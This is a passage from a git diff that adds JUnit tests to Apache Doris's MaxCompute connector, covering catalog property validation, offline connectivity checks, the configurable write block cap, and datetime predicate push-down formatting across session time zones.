b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProviderTest.java @@ -0,0 +1,372 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorTestResult; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Tests for {@link MaxComputeConnectorProvider#validateProperties(Map)}. + * + *

CREATE CATALOG must fail-fast on invalid MaxCompute properties, mirroring the + * legacy {@code MaxComputeExternalCatalog.checkProperties}. Without this validation + * the new SPI path degrades to use-time-late failures or silently accepts illegal + * values (e.g. account_format='foo' coerced to DISPLAYNAME, negative timeouts), so + * each case below pins one legacy validation branch. + */ +public class MaxComputeConnectorProviderTest { + + private final MaxComputeConnectorProvider provider = new MaxComputeConnectorProvider(); + + private Map validProps() { + Map props = new HashMap<>(); + props.put(MCConnectorProperties.PROJECT, "my_project"); + props.put(MCConnectorProperties.ENDPOINT, + "http://service.cn-beijing.maxcompute.aliyun-inc.com/api"); + // Default auth type is ak_sk; provide the keys so the minimal config is valid. + props.put(MCConnectorProperties.ACCESS_KEY, "ak"); + props.put(MCConnectorProperties.SECRET_KEY, "sk"); + return props; + } + + @Test + public void testValidPropertiesPass() { + Assertions.assertDoesNotThrow(() -> provider.validateProperties(validProps())); + } + + // --- 1. required PROJECT / ENDPOINT --- + + @Test + public void testMissingProject() { + Map props = validProps(); + props.remove(MCConnectorProperties.PROJECT); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains(MCConnectorProperties.PROJECT)); + } + + @Test + public void testMissingEndpoint() { + Map props = validProps(); + props.remove(MCConnectorProperties.ENDPOINT); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains(MCConnectorProperties.ENDPOINT)); + } + + // --- 2. split strategy + size/count floor --- + + @Test + public void testSplitByteSizeBelowFloor() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_BYTE_SIZE, "10485759"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("10485760")); + } + + @Test + public void testSplitByteSizeAtFloorPasses() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_BYTE_SIZE, "10485760"); + Assertions.assertDoesNotThrow(() -> provider.validateProperties(props)); + } + + @Test + public void testSplitByteSizeNotInteger() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_BYTE_SIZE, "abc"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("must be an integer")); + } + + @Test + public void testSplitStrategyInvalid() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_STRATEGY, "foo"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains( + MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY)); + } + + @Test + public void testSplitRowCountZero() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_STRATEGY, + MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY); + props.put(MCConnectorProperties.SPLIT_ROW_COUNT, "0"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("greater than 0")); + } + + @Test + public void testSplitRowCountStrategyValid() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_STRATEGY, + MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY); + props.put(MCConnectorProperties.SPLIT_ROW_COUNT, "100000"); + Assertions.assertDoesNotThrow(() -> provider.validateProperties(props)); + } + + // --- 3. account_format enum --- + + @Test + public void testAccountFormatInvalid() { + Map props = validProps(); + props.put(MCConnectorProperties.ACCOUNT_FORMAT, "foo"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("only support name and id")); + } + + @Test + public void testAccountFormatIdPasses() { + Map props = validProps(); + props.put(MCConnectorProperties.ACCOUNT_FORMAT, MCConnectorProperties.ACCOUNT_FORMAT_ID); + Assertions.assertDoesNotThrow(() -> provider.validateProperties(props)); + } + + @Test + public void testAccountFormatNamePasses() { + Map props = validProps(); + props.put(MCConnectorProperties.ACCOUNT_FORMAT, MCConnectorProperties.ACCOUNT_FORMAT_NAME); + Assertions.assertDoesNotThrow(() -> provider.validateProperties(props)); + } + + // --- 4. positive connect/read timeout + retry count --- + + @Test + public void testConnectTimeoutZero() { + Map props = validProps(); + props.put(MCConnectorProperties.CONNECT_TIMEOUT, "0"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains(MCConnectorProperties.CONNECT_TIMEOUT)); + Assertions.assertTrue(ex.getMessage().contains("greater than 0")); + } + + @Test + public void testConnectTimeoutNegative() { + Map props = validProps(); + props.put(MCConnectorProperties.CONNECT_TIMEOUT, "-1"); + Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + } + + @Test + public void testReadTimeoutNotInteger() { + Map props = validProps(); + props.put(MCConnectorProperties.READ_TIMEOUT, "abc"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("must be an integer")); + } + + @Test + public void testRetryCountZero() { + Map props = validProps(); + props.put(MCConnectorProperties.RETRY_COUNT, "0"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains(MCConnectorProperties.RETRY_COUNT)); + } + + // --- 5. auth completeness (wires the previously-dead checkAuthProperties, + // and verifies its exception type is now IllegalArgumentException) --- + + @Test + public void testAuthMissingSecretKey() { + Map props = validProps(); + props.remove(MCConnectorProperties.SECRET_KEY); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("secret key")); + } + + @Test + public void testAuthRamRoleArnMissingRoleArn() { + Map props = validProps(); + props.put(MCConnectorProperties.AUTH_TYPE, + MCConnectorProperties.AUTH_TYPE_RAM_ROLE_ARN); + // has access/secret key but no ram_role_arn + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("role arn")); + } + + @Test + public void testAuthUnknownType() { + Map props = validProps(); + props.put(MCConnectorProperties.AUTH_TYPE, "no_such_auth"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains("Unsupported auth type")); + } + + // --- 6. split-byte-size error message names the byte-size property, not row-count --- + // Migrated from MaxComputeExternalCatalogTest.testSplitByteSizeErrorMessage (PR + // apache/doris#64119), which fixed a copy-paste that printed SPLIT_ROW_COUNT in the + // SPLIT_BYTE_SIZE floor error. This fork was already correct (G6); the test pins it. + + @Test + public void testSplitByteSizeErrorMessageNamesByteSizeNotRowCount() { + Map props = validProps(); + props.put(MCConnectorProperties.SPLIT_STRATEGY, + MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY); + props.put(MCConnectorProperties.SPLIT_BYTE_SIZE, "1048576"); + IllegalArgumentException ex = Assertions.assertThrows( + IllegalArgumentException.class, + () -> provider.validateProperties(props)); + Assertions.assertTrue(ex.getMessage().contains(MCConnectorProperties.SPLIT_BYTE_SIZE), + "got: " + ex.getMessage()); + Assertions.assertFalse(ex.getMessage().contains(MCConnectorProperties.SPLIT_ROW_COUNT), + "got: " + ex.getMessage()); + } + + // --- 7. CREATE CATALOG connectivity test (test_connection) — the FE->ODPS half of catalog + // validation, complementing the property half above. Migrated from + // MaxComputeExternalCatalogTest.testCheckWhenCreating* (PR apache/doris#64119): the legacy + // MaxComputeExternalCatalog.checkWhenCreating override is now MaxComputeDorisConnector + // .testConnection(), wired by PluginDrivenExternalCatalog.checkWhenCreating (TEST_CONNECTION + // gate -> testConnection -> DdlException on failure). The two ODPS calls (project-exists / + // namespace-schema-list) are overridden so the tests run offline with no Mockito, mirroring the + // PR's TestMaxComputeExternalCatalog seam subclass. --- + + @Test + public void testMaxComputeDoesNotForceConnectivityTestByDefault() { + // PR testCheckWhenCreatingSkipsValidationByDefault: MaxCompute leaves test_connection off by + // default, so PluginDrivenExternalCatalog.checkWhenCreating skips testConnection entirely. + Assertions.assertFalse( + new MaxComputeDorisConnector(connectivityProps(true), null).defaultTestConnection()); + } + + @Test + public void testConnectionValidatesProjectWhenNamespaceSchemaDisabled() { + TestMaxComputeDorisConnector connector = + new TestMaxComputeDorisConnector(connectivityProps(false)); + ConnectorTestResult result = connector.testConnection(null); + Assertions.assertTrue(result.isSuccess(), "got: " + result.getMessage()); + Assertions.assertEquals("mc_project", connector.checkedProjectName); + Assertions.assertNull(connector.checkedNamespaceSchemaProjectName); + } + + @Test + public void testConnectionValidatesSchemaWhenNamespaceSchemaEnabled() { + TestMaxComputeDorisConnector connector = + new TestMaxComputeDorisConnector(connectivityProps(true)); + ConnectorTestResult result = connector.testConnection(null); + Assertions.assertTrue(result.isSuccess(), "got: " + result.getMessage()); + Assertions.assertEquals("mc_project", connector.checkedNamespaceSchemaProjectName); + Assertions.assertNull(connector.checkedProjectName); + } + + @Test + public void testConnectionReportsInaccessibleProject() { + TestMaxComputeDorisConnector connector = + new TestMaxComputeDorisConnector(connectivityProps(false)); + connector.projectExists = false; + ConnectorTestResult result = connector.testConnection(null); + Assertions.assertFalse(result.isSuccess()); + Assertions.assertTrue( + result.getMessage().contains("Failed to validate MaxCompute project 'mc_project'"), + "got: " + result.getMessage()); + Assertions.assertTrue( + result.getMessage().contains("does not exist or is not accessible"), + "got: " + result.getMessage()); + Assertions.assertNull(connector.checkedNamespaceSchemaProjectName); + } + + @Test + public void testConnectionReportsInaccessibleNamespaceSchema() { + TestMaxComputeDorisConnector connector = + new TestMaxComputeDorisConnector(connectivityProps(true)); + connector.threeTierModel = false; + ConnectorTestResult result = connector.testConnection(null); + Assertions.assertFalse(result.isSuccess()); + Assertions.assertTrue( + result.getMessage().contains("Failed to validate MaxCompute project 'mc_project'"), + "got: " + result.getMessage()); + Assertions.assertTrue( + result.getMessage().contains("schema list is accessible"), + "got: " + result.getMessage()); + } + + private static Map connectivityProps(boolean enableNamespaceSchema) { + Map props = new HashMap<>(); + props.put(MCConnectorProperties.PROJECT, "mc_project"); + props.put(MCConnectorProperties.ENDPOINT, + "http://service.cn-beijing.maxcompute.aliyun-inc.com/api"); + props.put(MCConnectorProperties.ACCESS_KEY, "access_key"); + props.put(MCConnectorProperties.SECRET_KEY, "secret_key"); + props.put(MCConnectorProperties.ENABLE_NAMESPACE_SCHEMA, + Boolean.toString(enableNamespaceSchema)); + return props; + } + + /** + * Overrides the two ODPS-touching seams so the connectivity test runs offline, mirroring the + * PR's {@code TestMaxComputeExternalCatalog}. {@code projectExists}/{@code threeTierModel} drive + * the simulated remote state; {@code checked*ProjectName} record which validation path ran. + */ + private static final class TestMaxComputeDorisConnector extends MaxComputeDorisConnector { + private boolean projectExists = true; + private boolean threeTierModel = true; + private String checkedProjectName; + private String checkedNamespaceSchemaProjectName; + + private TestMaxComputeDorisConnector(Map props) { + super(props, null); + } + + @Override + protected boolean maxComputeProjectExists(String projectName) { + checkedProjectName = projectName; + return projectExists; + } + + @Override + protected void validateMaxComputeNamespaceSchemaAccess(String projectName) { + checkedNamespaceSchemaProjectName = projectName; + if (!threeTierModel) { + throw new RuntimeException("schema list is not accessible"); + } + } + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransactionTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransactionTest.java new file mode 100644 index 00000000000000..074ccd774f4b16 --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransactionTest.java @@ -0,0 +1,137 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.DorisConnectorException; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Guards the write block-id cap (GC1 / FIX-BLOCKID-CAP-CONFIG). The cap mirrors legacy + * {@code MCTransaction.allocateBlockIdRange}, which reads the tunable + * {@code Config.max_compute_write_max_block_count}. The connector cannot import fe-core + * {@code Config}, so the live value is surfaced through {@code ConnectorSession.getSessionProperties()} + * (injected by fe-core's {@code ConnectorSessionBuilder}, the same channel as + * {@code lower_case_table_names}) and threaded into the transaction via its constructor. + * + *

Why this matters. The previous hardcoded {@code MAX_BLOCK_COUNT = 20000L} (DV-011) + * silently ignored a tuned fe.conf: a deployment that raised the cap could no longer run the large + * writes legacy allowed. These tests pin that the cap is now driven by the constructor argument + * (not a constant) and that resolution falls back to the legacy default when the session carries + * no value. The transaction is fe-core-free, so it is exercised directly — no network / live ODPS.

+ */ +public class MaxComputeConnectorTransactionTest { + + private static MaxComputeConnectorTransaction txnWithCap(long maxBlockCount) { + MaxComputeConnectorTransaction txn = new MaxComputeConnectorTransaction(1L, maxBlockCount); + // Only writeSessionId is consulted by allocateWriteBlockRange; identifier/settings (commit-only) may be null. + txn.setWriteSession("sess-1", null, null); + return txn; + } + + // ---- the cap is enforced at exactly maxBlockCount ---- + + @Test + public void testAllocationUpToCapSucceedsAndBeyondThrows() { + MaxComputeConnectorTransaction txn = txnWithCap(5L); + Assertions.assertEquals(0L, txn.allocateWriteBlockRange("sess-1", 3)); // [0,3) + Assertions.assertEquals(3L, txn.allocateWriteBlockRange("sess-1", 2)); // [3,5) -> endExclusive == cap, allowed + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> txn.allocateWriteBlockRange("sess-1", 1)); // 5+1 > 5 + Assertions.assertTrue(ex.getMessage().contains("maxBlockCount=5"), + "the limit error must report the configured cap; got: " + ex.getMessage()); + } + + // ---- the limit is driven by the constructor arg, NOT a hardcoded 20000 ---- + + @Test + public void testCapIsConfigurableNotHardcoded() { + // 8 blocks: rejected under cap 5, allowed under cap 10. A hardcoded 20000 would allow both, + // so this would fail if the cap were still a constant. + MaxComputeConnectorTransaction small = txnWithCap(5L); + Assertions.assertThrows(DorisConnectorException.class, + () -> small.allocateWriteBlockRange("sess-1", 8)); + + MaxComputeConnectorTransaction large = txnWithCap(10L); + Assertions.assertEquals(0L, large.allocateWriteBlockRange("sess-1", 8)); + } + + // ---- resolveMaxBlockCount: present -> parsed; absent / unparseable -> legacy default ---- + + @Test + public void testResolveMaxBlockCountParsesInjectedValue() { + Map props = new HashMap<>(); + props.put("max_compute_write_max_block_count", "50000"); + Assertions.assertEquals(50000L, MaxComputeConnectorMetadata.resolveMaxBlockCount(props)); + } + + @Test + public void testResolveMaxBlockCountFallsBackWhenAbsent() { + Assertions.assertEquals(MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT, + MaxComputeConnectorMetadata.resolveMaxBlockCount(new HashMap<>())); + Assertions.assertEquals(20000L, MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT); + } + + @Test + public void testResolveMaxBlockCountFallsBackWhenUnparseable() { + Map props = new HashMap<>(); + props.put("max_compute_write_max_block_count", "not-a-number"); + Assertions.assertEquals(MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT, + MaxComputeConnectorMetadata.resolveMaxBlockCount(props)); + } + + // ---- reject writing to ODPS external tables / logical views ---- + // Migrated from MCTransaction.beginInsert / MCTransactionTest (PR apache/doris#64119). The write + // path now gates in MaxComputeWritePlanProvider.planWrite via + // MaxComputeTableHandle.checkOperationSupported("Writing") before opening a write session; the + // ODPS Storage API cannot write to external tables or logical views. The guard is exercised + // directly here (the connector test module has no Mockito to fake an ODPS Table). + + @Test + public void testWriteRejectsOdpsExternalTable() { + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> MaxComputeTableHandle.checkOperationSupported( + true, false, "Writing", "default", "mc_external_table")); + Assertions.assertTrue(ex.getMessage().contains( + "Writing MaxCompute external table or logical view is not supported: " + + "default.mc_external_table"), + "got: " + ex.getMessage()); + } + + @Test + public void testWriteRejectsOdpsLogicalView() { + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> MaxComputeTableHandle.checkOperationSupported( + false, true, "Writing", "default", "mc_logical_view")); + Assertions.assertTrue(ex.getMessage().contains( + "Writing MaxCompute external table or logical view is not supported: " + + "default.mc_logical_view"), + "got: " + ex.getMessage()); + } + + @Test + public void testWriteAllowsManagedTable() { + // a normal (non-external, non-view) table must not be rejected (guards against over-rejection) + Assertions.assertDoesNotThrow(() -> MaxComputeTableHandle.checkOperationSupported( + false, false, "Writing", "default", "mc_managed_table")); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverterTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverterTest.java new file mode 100644 index 00000000000000..eaa1864e2edc6d --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverterTest.java @@ -0,0 +1,267 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; + +import com.aliyun.odps.OdpsType; +import com.aliyun.odps.table.optimizer.predicate.Predicate; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.time.LocalDateTime; +import java.util.Arrays; +import java.util.HashMap; +import java.util.Map; + +/** + * Guards {@link MaxComputePredicateConverter}'s DATETIME / TIMESTAMP / TIMESTAMP_NTZ predicate + * push-down formatting (FIX-DATETIME-PUSHDOWN-FORMAT, GAP0/1). The connector module has no + * fe-core / Mockito, so the converter is exercised directly with hand-built + * {@link ConnectorExpression}s — no network or live ODPS. + * + *

Why this matters. The literal value for a datetime column arrives as a + * {@link LocalDateTime} (from fe-core's {@code ExprToConnectorExpressionConverter.convertDateLiteral}). + * It must be pushed to ODPS as a space-separated, fixed-precision string in UTC, converted from the + * session time zone — exactly as legacy {@code MaxComputeScanNode.convertLiteralToOdpsValues} + * did. Two regressions are pinned here:

+ *
    + *
  • delta-1 (format): the previous {@code String.valueOf(value)} emitted + * {@link LocalDateTime#toString()}'s 'T'-separated, variable-precision form + * ({@code "2023-02-02T00:00"}), which the space-separated formatter could not parse — so the + * whole conjunct tree silently degraded to {@link Predicate#NO_PREDICATE} (predicate never + * pushed = full scan) on a non-UTC session, or pushed a malformed literal on a UTC session.
  • + *
  • delta-2 (timezone): the source time zone must be the session TZ + * ({@code ConnectorSession.getTimeZone()}), not the project-region TZ; using the wrong base + * shifts the pushed UTC literal and silently loses rows.
  • + *
+ */ +public class MaxComputePredicateConverterTest { + + private static final String UTC = "UTC"; + private static final String SHANGHAI = "Asia/Shanghai"; // fixed +08:00, no DST + // Doris accepts SET time_zone='CST' and stores it verbatim (mapping it to +08:00 via its own + // alias map), but java.time.ZoneId.of("CST") throws ZoneRulesException. + private static final String CST = "CST"; + + private static Map typeMap() { + Map m = new HashMap<>(); + m.put("dt", OdpsType.DATETIME); + m.put("ts", OdpsType.TIMESTAMP); + m.put("ntz", OdpsType.TIMESTAMP_NTZ); + m.put("id", OdpsType.INT); + return m; + } + + private static MaxComputePredicateConverter converter(boolean pushDown, String sourceTzId) { + return new MaxComputePredicateConverter(typeMap(), pushDown, sourceTzId); + } + + private static ConnectorComparison eq(String colName, ConnectorLiteral value) { + return new ConnectorComparison(ConnectorComparison.Operator.EQ, + new ConnectorColumnRef(colName, ConnectorType.of("DATETIME")), value); + } + + // ---- delta-1: format the LocalDateTime directly (space-separated, fixed precision) ---- + + @Test + public void testDatetimeFormatsWithSpaceSeparatorAndMillis() { + Predicate p = converter(true, UTC) + .convert(eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 0, 0, 0)))); + Assertions.assertTrue(p.toString().contains("\"2023-02-02 00:00:00.000\""), + "DATETIME must push a space-separated, 3-digit-fraction literal; got: " + p); + } + + @Test + public void testDatetimeFractionTruncatedToMillis() { + // nanos = 123456000 (.123456); DATETIME scale 3 truncates to .123, matching legacy + // getStringValue(DatetimeV2Type(3)) = microsecond / 1000. + Predicate p = converter(true, UTC).convert( + eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 0, 0, 0, 123456000)))); + Assertions.assertTrue(p.toString().contains("\"2023-02-02 00:00:00.123\""), + "DATETIME fraction must truncate to 3 digits; got: " + p); + } + + @Test + public void testTimestampFormatsWithMicros() { + Predicate p = converter(true, UTC).convert( + eq("ts", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 0, 0, 0, 123456000)))); + Assertions.assertTrue(p.toString().contains("\"2023-02-02 00:00:00.123456\""), + "TIMESTAMP must push a 6-digit fraction; got: " + p); + } + + // ---- delta-1: a non-UTC session must NOT drop the predicate (perf-regression repro) ---- + + @Test + public void testNonUtcDatetimeDoesNotDropPredicate() { + // Before the fix: String.valueOf(LocalDateTime) = "2023-02-02T08:00" -> parse with the + // space-separated formatter throws -> the whole tree degraded to NO_PREDICATE. + Predicate p = converter(true, SHANGHAI) + .convert(eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 8, 0, 0)))); + Assertions.assertNotSame(Predicate.NO_PREDICATE, p, + "a non-UTC DATETIME predicate must still be pushed down, not dropped"); + } + + // ---- delta-2: the source TZ is the session TZ (DATETIME/TIMESTAMP convert to UTC) ---- + + @Test + public void testDatetimeConvertsSessionTzToUtc() { + // Shanghai 08:00 -> UTC 00:00. Using the wrong source TZ would shift the literal and lose rows. + Predicate p = converter(true, SHANGHAI) + .convert(eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 8, 0, 0)))); + Assertions.assertTrue(p.toString().contains("\"2023-02-02 00:00:00.000\""), + "session TZ (Shanghai) 08:00 must convert to UTC 00:00; got: " + p); + } + + @Test + public void testTimestampNtzDoesNotConvertTz() { + // TIMESTAMP_NTZ has no timezone: legacy does NOT convert. Shanghai session, local 08:00 + // must stay 08:00 (only formatted), unlike DATETIME / TIMESTAMP. + Predicate p = converter(true, SHANGHAI) + .convert(eq("ntz", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 8, 0, 0)))); + Assertions.assertTrue(p.toString().contains("\"2023-02-02 08:00:00.000000\""), + "TIMESTAMP_NTZ must not apply TZ conversion; got: " + p); + } + + // ---- a datetime leaf must not collapse the whole tree ---- + + @Test + public void testMixedAndTreeNotDropped() { + ConnectorComparison idEq = new ConnectorComparison(ConnectorComparison.Operator.EQ, + new ConnectorColumnRef("id", ConnectorType.of("INT")), ConnectorLiteral.ofLong(5)); + // Shanghai 08:00 -> UTC 00:00 (same kept-conjunct check as the dedicated delta-2 test). + ConnectorAnd and = new ConnectorAnd(Arrays.asList(idEq, + eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 8, 0, 0))))); + Predicate p = converter(true, SHANGHAI).convert(and); + Assertions.assertNotSame(Predicate.NO_PREDICATE, p); + Assertions.assertTrue(p.toString().contains("2023-02-02 00:00:00.000"), + "the AND tree must keep the converted datetime conjunct; got: " + p); + } + + // ---- IN-list datetime goes through the same formatting path ---- + + @Test + public void testDatetimeInListFormatsEachValue() { + // convertIn -> formatLiteralValue: each datetime element must be space-separated formatted. + ConnectorIn in = new ConnectorIn( + new ConnectorColumnRef("dt", ConnectorType.of("DATETIME")), + Arrays.asList( + ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 0, 0, 0)), + ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 3, 3, 0, 0, 0))), + false); + String s = converter(true, UTC).convert(in).toString(); + Assertions.assertTrue( + s.contains("\"2023-02-02 00:00:00.000\"") && s.contains("\"2023-03-03 00:00:00.000\""), + "each IN-list datetime element must be space-separated formatted; got: " + s); + } + + // ---- F1: a Doris-valid-but-ZoneId-invalid session zone (e.g. CST) must degrade the datetime + // predicate, NOT throw out of planning, and must NOT block non-datetime pushdown ---- + + @Test + public void testUnparseableSessionZoneDegradesDatetimePredicate() { + // SET time_zone='CST' is accepted by Doris and stored verbatim, but ZoneId.of("CST") throws. + // Lazy parse inside convert()'s catch -> the datetime predicate degrades to NO_PREDICATE + // (BE re-filters) instead of failing the whole query (legacy MaxComputeScanNode parity). + Predicate p = converter(true, CST) + .convert(eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 0, 0, 0)))); + Assertions.assertSame(Predicate.NO_PREDICATE, p); + } + + @Test + public void testUnparseableSessionZoneStillPushesNonDatetimePredicate() { + // A non-datetime predicate never resolves the zone, so it must still push down under a CST + // session (legacy resolves the zone only inside convertDateTimezone, for datetime literals). + ConnectorComparison idEq = new ConnectorComparison(ConnectorComparison.Operator.EQ, + new ConnectorColumnRef("id", ConnectorType.of("INT")), ConnectorLiteral.ofLong(5)); + Predicate p = converter(true, CST).convert(idEq); + Assertions.assertNotSame(Predicate.NO_PREDICATE, p); + Assertions.assertTrue(p.toString().contains("id"), + "non-datetime predicate must push under a CST session; got: " + p); + } + + @Test + public void testTimestampNtzPushesUnderUnparseableZone() { + // TIMESTAMP_NTZ does no TZ conversion -> never parses the zone -> pushes even under CST. + Predicate p = converter(true, CST) + .convert(eq("ntz", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 8, 0, 0)))); + Assertions.assertTrue(p.toString().contains("\"2023-02-02 08:00:00.000000\""), + "TIMESTAMP_NTZ must push (no zone parse) even under a CST session; got: " + p); + } + + // ---- guards ---- + + @Test + public void testNonLocalDateTimeValueDropsPredicate() { + // Defensive: a non-LocalDateTime value for a datetime column -> throw -> caught -> dropped + // (mirrors legacy throwing for a non-DateLiteral, which drops the predicate). + Predicate p = converter(true, UTC).convert(eq("dt", ConnectorLiteral.ofString("2023-02-02 00:00:00"))); + Assertions.assertSame(Predicate.NO_PREDICATE, p); + } + + @Test + public void testPushDownDisabledDropsDatetimePredicate() { + // dateTimePushDown = false -> DATETIME branch falls through -> throw -> dropped (BE filters). + Predicate p = converter(false, UTC) + .convert(eq("dt", ConnectorLiteral.ofDatetime(LocalDateTime.of(2023, 2, 2, 0, 0, 0)))); + Assertions.assertSame(Predicate.NO_PREDICATE, p); + } + + // ---- G2 (FIX-PREDICATE-COLGUARD): a predicate on a column absent from the table schema must + // degrade to NO_PREDICATE (legacy MaxComputeScanNode containsKey-guard parity), NOT push a + // malformed predicate to ODPS. "ghost" is not in typeMap(). ---- + + @Test + public void testUnknownColumnComparisonDropsPredicate() { + // Before the fix, formatLiteralValue quoted the value and pushed `ghost == "5"`; now it + // throws -> convert()'s catch -> NO_PREDICATE (BE re-filters), so no malformed pushdown. + ConnectorComparison cmp = new ConnectorComparison(ConnectorComparison.Operator.EQ, + new ConnectorColumnRef("ghost", ConnectorType.of("INT")), ConnectorLiteral.ofLong(5)); + Predicate p = converter(true, UTC).convert(cmp); + Assertions.assertSame(Predicate.NO_PREDICATE, p, + "a predicate on an 